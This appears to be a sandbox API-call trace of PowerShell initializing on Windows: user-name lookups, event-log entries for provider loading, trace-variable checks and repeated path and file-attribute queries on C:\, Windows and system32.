	[0798.419] SetErrorMode (uMode=0x1) returned 0x1
	[0798.419] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ecd20 | out: lpFileInformation=0x1ecd20*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0798.419] SetErrorMode (uMode=0x1) returned 0x1
	[0798.420] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ecb60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0798.420] SetErrorMode (uMode=0x1) returned 0x1
	[0798.420] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ecdc0 | out: lpFileInformation=0x1ecdc0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0798.420] SetErrorMode (uMode=0x1) returned 0x1
	[0798.420] CoTaskMemAlloc (cb=0x804) returned 0x1b8afae0
	[0798.420] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8afae0, nSize=0x1ed1c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed1c8) returned 0x1
	[0798.424] CoTaskMemFree (pv=0x1b8afae0) 
	[0798.424] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0798.424] GetUserNameW (in: lpBuffer=0x403ff0, pcbBuffer=0x1ed208 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed208) returned 1
	[0798.424] CoTaskMemFree (pv=0x403ff0) 
	[0798.425] ReportEventW (hEventLog=0x1b980008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30903a8*="FileSystem", lpRawData=0x3090138) returned 1
	[0798.426] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0798.426] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0798.426] CoTaskMemFree (pv=0x41ebe0) 
	[0798.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0798.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0798.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0798.428] CoTaskMemAlloc (cb=0x804) returned 0x1b8afae0
	[0798.428] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8afae0, nSize=0x1ed1c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed1c8) returned 0x1
	[0799.410] CoTaskMemFree (pv=0x1b8afae0) 
	[0799.410] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0799.410] GetUserNameW (in: lpBuffer=0x403ff0, pcbBuffer=0x1ed208 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed208) returned 1
	[0799.410] CoTaskMemFree (pv=0x403ff0) 
	[0799.411] ReportEventW (hEventLog=0x1b980008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3095be8*="Function", lpRawData=0x3095978) returned 1
	[0800.115] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0800.115] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0800.115] CoTaskMemFree (pv=0x41ebe0) 
	[0800.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0800.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0800.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0800.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0801.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0801.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0801.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0801.037] CoTaskMemAlloc (cb=0x804) returned 0x1b8afae0
	[0801.037] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8afae0, nSize=0x1ed1c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed1c8) returned 0x1
	[0801.037] CoTaskMemFree (pv=0x1b8afae0) 
	[0801.037] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0801.037] GetUserNameW (in: lpBuffer=0x403ff0, pcbBuffer=0x1ed208 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed208) returned 1
	[0801.037] CoTaskMemFree (pv=0x403ff0) 
	[0801.038] ReportEventW (hEventLog=0x1b980008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30b8410*="Registry", lpRawData=0x30b81a0) returned 1
	[0802.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0802.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0802.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0802.018] CoTaskMemAlloc (cb=0x804) returned 0x1b8afae0
	[0802.018] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8afae0, nSize=0x1ed1c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed1c8) returned 0x1
	[0802.018] CoTaskMemFree (pv=0x1b8afae0) 
	[0802.018] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0802.018] GetUserNameW (in: lpBuffer=0x403ff0, pcbBuffer=0x1ed208 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed208) returned 1
	[0802.019] CoTaskMemFree (pv=0x403ff0) 
	[0802.019] ReportEventW (hEventLog=0x1b980008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30bd828*="Variable", lpRawData=0x30bd5b8) returned 1
	[0802.021] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0802.021] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.021] CoTaskMemFree (pv=0x41ebe0) 
	[0802.024] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0802.024] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.024] CoTaskMemFree (pv=0x41ebe0) 
	[0802.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0802.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ec9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0802.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ec9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0802.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ec9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0804.515] CoTaskMemAlloc (cb=0x804) returned 0x1b8b9550
	[0804.515] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8b9550, nSize=0x1ed1c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed1c8) returned 0x1
	[0804.516] CoTaskMemFree (pv=0x1b8b9550) 
	[0804.516] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0804.516] GetUserNameW (in: lpBuffer=0x403ff0, pcbBuffer=0x1ed208 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed208) returned 1
	[0804.516] CoTaskMemFree (pv=0x403ff0) 
	[0804.516] ReportEventW (hEventLog=0x1b980008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30d1440*="Certificate", lpRawData=0x30d11d0) returned 1
	[0805.488] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0805.488] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.488] CoTaskMemFree (pv=0x41ebe0) 
	[0805.492] GetLogicalDrives () returned 0x4
	[0805.492] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ece50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0805.492] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0805.493] CoTaskMemAlloc (cb=0x20e) returned 0x4503e0
	[0805.493] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x4503e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0805.493] CoTaskMemFree (pv=0x4503e0) 
	[0805.495] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0805.495] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.495] CoTaskMemFree (pv=0x41ebe0) 
	[0805.495] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0805.495] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.495] CoTaskMemFree (pv=0x41ebe0) 
	[0806.440] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0806.440] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.440] CoTaskMemFree (pv=0x41ebe0) 
	[0806.441] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0806.441] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.441] CoTaskMemFree (pv=0x41ebe0) 
	[0806.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0806.442] SetErrorMode (uMode=0x1) returned 0x1
	[0806.442] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ece10 | out: lpFileInformation=0x1ece10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0808.966] SetErrorMode (uMode=0x1) returned 0x1
	[0808.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0808.966] SetErrorMode (uMode=0x1) returned 0x1
	[0808.966] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ece10 | out: lpFileInformation=0x1ece10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0808.966] SetErrorMode (uMode=0x1) returned 0x1
	[0808.967] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0808.967] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.967] CoTaskMemFree (pv=0x41ebe0) 
	[0808.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0808.969] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ecbc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0808.969] SetErrorMode (uMode=0x1) returned 0x1
	[0808.970] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ecdd0 | out: lpFileInformation=0x1ecdd0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0808.970] SetErrorMode (uMode=0x1) returned 0x1
	[0808.970] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ecbc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0808.970] SetErrorMode (uMode=0x1) returned 0x1
	[0808.970] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ecdd0 | out: lpFileInformation=0x1ecdd0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0808.970] SetErrorMode (uMode=0x1) returned 0x1
	[0808.970] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ecbd0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0808.970] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ecac0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0808.970] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ecbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0808.970] SetErrorMode (uMode=0x1) returned 0x1
	[0808.971] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1ecdd0 | out: lpFileInformation=0x1ecdd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0808.971] SetErrorMode (uMode=0x1) returned 0x1
	[0808.971] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ecbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0808.971] SetErrorMode (uMode=0x1) returned 0x1
	[0808.971] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1ecdd0 | out: lpFileInformation=0x1ecdd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0808.971] SetErrorMode (uMode=0x1) returned 0x1
	[0808.971] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ecbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0808.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x1ecac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0808.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0808.971] SetErrorMode (uMode=0x1) returned 0x1
	[0808.971] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ecdd0 | out: lpFileInformation=0x1ecdd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0808.971] SetErrorMode (uMode=0x1) returned 0x1
	[0808.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0808.972] SetErrorMode (uMode=0x1) returned 0x1
	[0808.972] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ecdd0 | out: lpFileInformation=0x1ecdd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0808.972] SetErrorMode (uMode=0x1) returned 0x1
	[0808.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0808.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x1ecac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0808.972] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ecc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0808.972] SetErrorMode (uMode=0x1) returned 0x1
	[0808.972] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1ece10 | out: lpFileInformation=0x1ece10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0808.972] SetErrorMode (uMode=0x1) returned 0x1
	[0808.973] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ecc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0808.973] SetErrorMode (uMode=0x1) returned 0x1
	[0808.973] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1ece10 | out: lpFileInformation=0x1ece10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0808.973] SetErrorMode (uMode=0x1) returned 0x1
	[0808.973] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ecc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0808.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x1ecb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0808.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0808.973] SetErrorMode (uMode=0x1) returned 0x1
